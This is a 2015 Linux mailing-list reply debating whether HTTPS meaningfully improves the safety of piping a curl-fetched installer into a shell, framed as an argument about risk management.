[clug] How you know your Free or Open Source Software Project is doomed to FAIL

Scott Ferguson scott.ferguson.clug at gmail.com
Thu Jul 30 04:15:52 UTC 2015

On 30/07/15 11:32, Paul Harvey wrote:
> On 30 July 2015 at 11:16, Michael Cohen <scudette at gmail.com> wrote:
>> I'm sorry I fail to understand how this is any worst than hosting your
>> installer on plain HTTP. Piping a curl installer to shell is not better or
>> worse than distributing your software on plain HTTP or downloads.com or
>> something.
> I suppose what you're getting at is that https makes no guarantees
> about the original code you're trying to download: the original code
> may itself be hostile, and so no amount of transport layer security
> will change anything.
> But this ignores problems at the connection/network transport layer.
> Which is not incompatible with the fact that most Linux distros still
> rely on plain http mirrors (so as not to break proxy caches); but they
> still have PGP and friends to validate delivered files.
> Surely https, warts and all, allows for at least slightly better
> hygiene than blind faith in your physical network and http.

If slightly better hygiene is running hot water over the scalpel instead
of giving it a "bit of a wipe on your sleeve" - I'm not going to let you
operate on me :)

Neither is hygienic.

To expand - it's like saying that two entries in lotto has better odds
than one game. It's both true and extremely unlikely to result in a
better outcome. In both cases the worst case outcome is a total loss.

Probability of a bad outcome is only one factor of risk management. "How
much can it hurt if it goes wrong" is the other. They both need to be
factored into a policy. (IMO).

Interesting questions Paul.

Kind regards

More information about the linux mailing list